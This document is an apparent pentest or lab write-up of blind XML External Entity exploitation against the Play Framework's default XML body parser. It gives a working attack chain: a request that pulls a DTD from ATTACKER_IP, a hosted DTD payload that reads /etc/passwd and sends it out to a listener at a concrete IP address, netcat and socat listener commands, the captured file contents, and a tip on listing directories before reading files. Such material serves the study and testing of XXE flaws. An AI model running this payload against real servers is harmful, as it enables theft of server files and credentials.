Play Framework: XML External Entity (XXE) Exploitation
info
Play's default body parser parses the request body as XML whenever the request carries Content-Type: text/xml (or application/xml), even if the action never reads the parsed body. Any endpoint that accepts a POST with the default parser is therefore a candidate, not only those that expect XML.
Root Cause
- External entities are not disabled in Play's XML parser.
- External entities can reference:
- Local files (file:///)
- Remote resources (http://)
- The attack is blind: file contents are not reflected in HTTP responses.
Exploitation Strategy
Because the attack is blind, data is exfiltrated through out-of-band (OOB) requests: the victim's parser is made to fetch a URL on an attacker-controlled host with the file contents embedded in it.
Four terminals are needed:
- One to send the malicious XML request
- One to host the malicious DTD (port 3000 below)
- One to receive the exfiltrated data (port 3001 below)
- One for debugging/logging
Step 1: Send Malicious XML Request
Original Request:
POST /login HTTP/1.1
Host: rezydev.xyz
Content-Type: application/x-www-form-urlencoded
..snip..
username=test&password=test
Modified XML Request:
POST /login HTTP/1.1
Host: rezydev.xyz
Content-Type: text/xml
..snip..
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://ATTACKER_IP:3000/test.dtd">
<foo>&e1;</foo>
This request:
- Forces Play to parse the body as XML (because of the text/xml Content-Type)
- Makes the parser fetch the external DTD from the attacker-controlled server and process it before the document body
Step 2: Host Malicious DTD
DTD Payload (File Read)
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://129.154.241.42:3001/BLAH?%p1;'>">
%p2;
Explanation
- %p1; reads the target file into a parameter entity.
- %p2; declares a new general entity e1 whose SYSTEM URL points at the attacker's listener with the file contents appended as the query string. Parameter entity references inside an entity value are only permitted in the external DTD subset, which is why the DTD must be hosted rather than inlined in the request.
- &e1; in the request body resolves that URL, so the parser itself makes the HTTP request that carries the data.
Caveat: the file content ends up inside a URL, so files containing newlines, spaces, #, % or other URL-reserved characters may not produce a valid URL in Java and the request may fail silently; small single-line files work most reliably, and ftp:// is the usual workaround for multi-line content.
Step 3: Receive Exfiltrated Data
Listener Options
nc -lvnp 3001
socat TCP-LISTEN:3001,reuseaddr,fork - ## Better: keeps listening after each connection instead of exiting after the first one
Result (the raw request line received by the listener):
GET /BLAH?root:x:0:0:root:/root:/bin/sh...
URL-decode the query string to recover the file contents. The listener host and port must match the ones written into the DTD, and the target must be able to reach them.
info
Java's file:// handler returns a directory listing when the entity's SYSTEM URL points at a directory (for example file:///etc/), so the same DTD can be used to enumerate file names before reading them.